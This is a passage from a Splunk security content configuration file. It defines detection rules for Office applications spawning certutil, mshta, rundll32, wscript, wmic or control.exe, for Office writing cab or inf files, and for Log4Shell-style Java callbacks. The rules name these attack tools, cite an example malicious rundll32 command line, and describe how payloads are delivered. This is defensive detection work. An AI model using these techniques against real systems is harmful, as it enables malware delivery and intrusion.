In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `certutil.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.notable.param.rule_title = Office Product Spawning CertUtil action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe", "Graph.exe","winproj.exe") `process_certutil` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_certutil_filter` [ESCU - Office Product Spawning MSHTA - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `mshta.exe`. In malicious instances, the command-line of `mshta.exe` will contain the `hta` file locally, or a URL to the remote destination. In addition, Threat Research has released a detections identifying suspicious use of `mshta.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `mshta.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `mshta.exe`. In malicious instances, the command-line of `mshta.exe` will contain the `hta` file locally, or a URL to the remote destination. In addition, Threat Research has released a detections identifying suspicious use of `mshta.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `mshta.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = No false positives known. Filter as needed. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawning MSHTA - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "IcedID", "Azorult", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "NjRAT"] action.risk = 1 action.risk.param._risk_message = office parent process $parent_process_name$ will execute a suspicious child process $process_name$ with process id $process_id$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawning MSHTA - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "IcedID", "Azorult", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "NjRAT"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `mshta.exe`. In malicious instances, the command-line of `mshta.exe` will contain the `hta` file locally, or a URL to the remote destination. In addition, Threat Research has released a detections identifying suspicious use of `mshta.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `mshta.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.notable.param.rule_title = Office Product Spawning MSHTA action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe", "onenote.exe","onenotem.exe", "msaccess.exe","Graph.exe","winproj.exe") `process_mshta` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_mshta_filter` [ESCU - Office Product Spawning Rundll32 with no DLL - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the latest behavior utilized by IcedID malware family. This detection identifies any Windows Office Product spawning `rundll32.exe` without a `.dll` file extension. In malicious instances, the command-line of `rundll32.exe` will look like `rundll32 ..\oepddl.igk2,DllRegisterServer`. In addition, Threat Research has released a detection identifying the use of `DllRegisterServer` on the command-line of `rundll32.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze the `DLL` that was dropped to disk. The Office Product will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies the latest behavior utilized by IcedID malware family. This detection identifies any Windows Office Product spawning `rundll32.exe` without a `.dll` file extension. In malicious instances, the command-line of `rundll32.exe` will look like `rundll32 ..\oepddl.igk2,DllRegisterServer`. In addition, Threat Research has released a detection identifying the use of `DllRegisterServer` on the command-line of `rundll32.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze the `DLL` that was dropped to disk. The Office Product will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, but if any are present, filter as needed. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawning Rundll32 with no DLL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = office parent process $parent_process_name$ will execute a suspicious child process $process_name$ with process id $process_id$ and no dll commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawning Rundll32 with no DLL - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the latest behavior utilized by IcedID malware family. This detection identifies any Windows Office Product spawning `rundll32.exe` without a `.dll` file extension. In malicious instances, the command-line of `rundll32.exe` will look like `rundll32 ..\oepddl.igk2,DllRegisterServer`. In addition, Threat Research has released a detection identifying the use of `DllRegisterServer` on the command-line of `rundll32.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze the `DLL` that was dropped to disk. The Office Product will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.notable.param.rule_title = Office Product Spawning Rundll32 with no DLL action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe", "Graph.exe","winproj.exe") `process_rundll32` (Processes.process!=*.dll*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_rundll32_with_no_dll_filter` [ESCU - Office Product Spawning Windows Script Host - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic will identify a Windows Office Product spawning WScript.exe or CScript.exe. Tuning may be required based on legitimate application usage that may spawn scripts from an Office product. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic will identify a Windows Office Product spawning WScript.exe or CScript.exe. Tuning may be required based on legitimate application usage that may spawn scripts from an Office product. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present based on macro based approved documents in the organization. Filtering may be needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawning Windows Script Host - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Remcos", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = office parent process $parent_process_name$ will execute a suspicious child process $process_name$ on host $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawning Windows Script Host - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Remcos", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic will identify a Windows Office Product spawning WScript.exe or CScript.exe. Tuning may be required based on legitimate application usage that may spawn scripts from an Office product. action.notable.param.rule_title = Office Product Spawning Windows Script Host action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe","Graph.exe","winproj.exe") Processes.process_name IN ("wscript.exe", "cscript.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_windows_script_host_filter` [ESCU - Office Product Spawning Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the latest behavior utilized by Ursnif malware family. This detection identifies any Windows Office Product spawning `wmic.exe`. In malicious instances, the command-line of `wmic.exe` will contain `wmic process call create`. In addition, Threat Research has released a detection identifying the use of `wmic process call create` on the command-line of `wmic.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `wmic.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies the latest behavior utilized by Ursnif malware family. This detection identifies any Windows Office Product spawning `wmic.exe`. In malicious instances, the command-line of `wmic.exe` will contain `wmic process call create`. In addition, Threat Research has released a detection identifying the use of `wmic process call create` on the command-line of `wmic.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `wmic.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = No false positives known. Filter as needed. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawning Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "FIN7", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = office parent process $parent_process_name$ will execute a suspicious child process $process_name$ with process id $process_id$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawning Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "FIN7", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the latest behavior utilized by Ursnif malware family. This detection identifies any Windows Office Product spawning `wmic.exe`. In malicious instances, the command-line of `wmic.exe` will contain `wmic process call create`. In addition, Threat Research has released a detection identifying the use of `wmic process call create` on the command-line of `wmic.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `wmic.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.notable.param.rule_title = Office Product Spawning Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe", "Graph.exe","winproj.exe") `process_wmic` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_wmic_filter` [ESCU - Office Product Writing cab or inf - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies behavior related to CVE-2021-40444. Whereas the malicious document will load ActiveX and download the remote payload (.inf, .cab). During triage, review parallel processes and further activity on endpoint to identify additional patterns. Retrieve the file modifications and analyze further. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies behavior related to CVE-2021-40444. Whereas the malicious document will load ActiveX and download the remote payload (.inf, .cab). During triage, review parallel processes and further activity on endpoint to identify additional patterns. Retrieve the file modifications and analyze further. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node. action.escu.known_false_positives = The query is structured in a way that `action` (read, create) is not defined. Review the results of this query, filter, and tune as necessary. It may be necessary to generate this query specific to your endpoint product. action.escu.creation_date = 2023-02-15 action.escu.modification_date = 2023-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Writing cab or inf - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on $dest$ writing an inf or cab file to this. This is not typical of $process_name$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Writing cab or inf - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies behavior related to CVE-2021-40444. Whereas the malicious document will load ActiveX and download the remote payload (.inf, .cab). During triage, review parallel processes and further activity on endpoint to identify additional patterns. Retrieve the file modifications and analyze further. action.notable.param.rule_title = Office Product Writing cab or inf action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid | join proc_guid, _time [ | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.inf","*.cab") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields _time dest file_create_time file_name file_path process_name process_path process proc_guid] | dedup file_create_time | table dest, process_name, process, file_create_time, file_name, file_path, proc_guid | `office_product_writing_cab_or_inf_filter` [ESCU - Office Spawning Control - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies control.exe spawning from an office product. This detection identifies any Windows Office Product spawning `control.exe`. In malicious instances, the command-line of `control.exe` will contain a file path to a .cpl or .inf, related to CVE-2021-40444. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. review parallel and child processes to identify further suspicious behavior action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies control.exe spawning from an office product. This detection identifies any Windows Office Product spawning `control.exe`. In malicious instances, the command-line of `control.exe` will contain a file path to a .cpl or .inf, related to CVE-2021-40444. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. review parallel and child processes to identify further suspicious behavior action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives should be present. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Spawning Control - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ clicking a suspicious attachment. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Spawning Control - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies control.exe spawning from an office product. This detection identifies any Windows Office Product spawning `control.exe`. In malicious instances, the command-line of `control.exe` will contain a file path to a .cpl or .inf, related to CVE-2021-40444. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. review parallel and child processes to identify further suspicious behavior action.notable.param.rule_title = Office Spawning Control action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") Processes.process_name=control.exe by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `office_spawning_control_filter` [ESCU - Outbound Network Connection from Java Using Default Ports - Rule] action.escu = 0 action.escu.enabled = 1 description = A required step while exploiting the CVE-2021-44228-Log4j vulnerability is that the victim server will perform outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successfull exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = A required step while exploiting the CVE-2021-44228-Log4j vulnerability is that the victim server will perform outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successfull exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate Java applications may use perform outbound connections to these ports. Filter as needed action.escu.creation_date = 2022-06-28 action.escu.modification_date = 2022-06-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Outbound Network Connection from Java Using Default Ports - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Log4Shell CVE-2021-44228"] action.risk = 1 action.risk.param._risk_message = Java performed outbound connections to default ports of LDAP or RMI on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Outbound Network Connection from Java Using Default Ports - Rule action.correlationsearch.annotations = {"analytic_story": ["Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 60, "cve": ["CVE-2021-44228"], "impact": 90, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = A required step while exploiting the CVE-2021-44228-Log4j vulnerability is that the victim server will perform outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successfull exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection. action.notable.param.rule_title = Outbound Network Connection from Java Using Default Ports action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where (Processes.process_name="java.exe" OR Processes.process_name=javaw.exe OR Processes.process_name=javaw.exe) by _time Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process 